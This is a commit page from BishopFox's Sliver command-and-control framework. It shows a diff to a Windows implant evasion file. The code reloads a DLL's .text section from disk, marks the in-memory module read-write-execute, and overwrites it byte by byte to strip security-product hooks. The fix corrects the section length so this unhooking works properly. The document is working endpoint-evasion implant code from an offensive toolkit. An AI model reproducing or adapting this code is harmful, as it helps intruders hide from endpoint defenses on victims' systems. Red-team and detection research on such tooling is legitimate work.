Merge pull request #1489 from Z3ratu1/fix/correct-section-length-in-e…

…vasion_windows.go correct section length in evasion_windows.go
BishopFox · Dec 4, 2023 · c1242a8 · c1242a8
2 parents 0611667 + d2bd8dd
commit c1242a8
Showing 1 changed file with 8 additions and 9 deletions.
diff --git a/implant/sliver/evasion/evasion_windows.go b/implant/sliver/evasion/evasion_windows.go
@@ -25,7 +25,6 @@ import (
 	"log"
 	//{{end}}
 	"debug/pe"
-	"io/ioutil"
 	"unsafe"
 )
 
@@ -35,17 +34,16 @@ func RefreshPE(name string) error {
 	//{{if .Config.Debug}}
 	log.Printf("Reloading %s...\n", name)
 	//{{end}}
-	df, e := ioutil.ReadFile(name)
-	if e != nil {
-		return e
-	}
 	f, e := pe.Open(name)
 	if e != nil {
 		return e
 	}
 
 	x := f.Section(".text")
-	ddf := df[x.Offset:x.Size]
+	ddf, e := x.Data()
+	if e != nil {
+		return e
+	}
 	return writeGoodBytes(ddf, name, x.VirtualAddress, x.Name, x.VirtualSize)
 }
 
@@ -60,15 +58,16 @@ func writeGoodBytes(b []byte, pn string, virtualoffset uint32, secname string, v
 	dllOffset := uint(dllBase) + uint(virtualoffset)
 
 	var old uint32
-	e = windows.VirtualProtect(uintptr(dllOffset), uintptr(len(b)), windows.PAGE_EXECUTE_READWRITE, &old)
+	e = windows.VirtualProtect(uintptr(dllOffset), uintptr(vsize), windows.PAGE_EXECUTE_READWRITE, &old)
 	if e != nil {
 		return e
 	}
 	//{{if .Config.Debug}}
 	log.Println("Made memory map RWX")
 	//{{end}}
 
-	for i := 0; i < len(b); i++ {
+	// vsize should always smaller than len(b)
+	for i := 0; i < int(vsize); i++ {
 		loc := uintptr(dllOffset + uint(i))
 		mem := (*[1]byte)(unsafe.Pointer(loc))
 		(*mem)[0] = b[i]
@@ -77,7 +76,7 @@ func writeGoodBytes(b []byte, pn string, virtualoffset uint32, secname string, v
 	//{{if .Config.Debug}}
 	log.Println("DLL overwritten")
 	//{{end}}
-	e = windows.VirtualProtect(uintptr(dllOffset), uintptr(len(b)), old, &old)
+	e = windows.VirtualProtect(uintptr(dllOffset), uintptr(vsize), old, &old)
 	if e != nil {
 		return e
 	}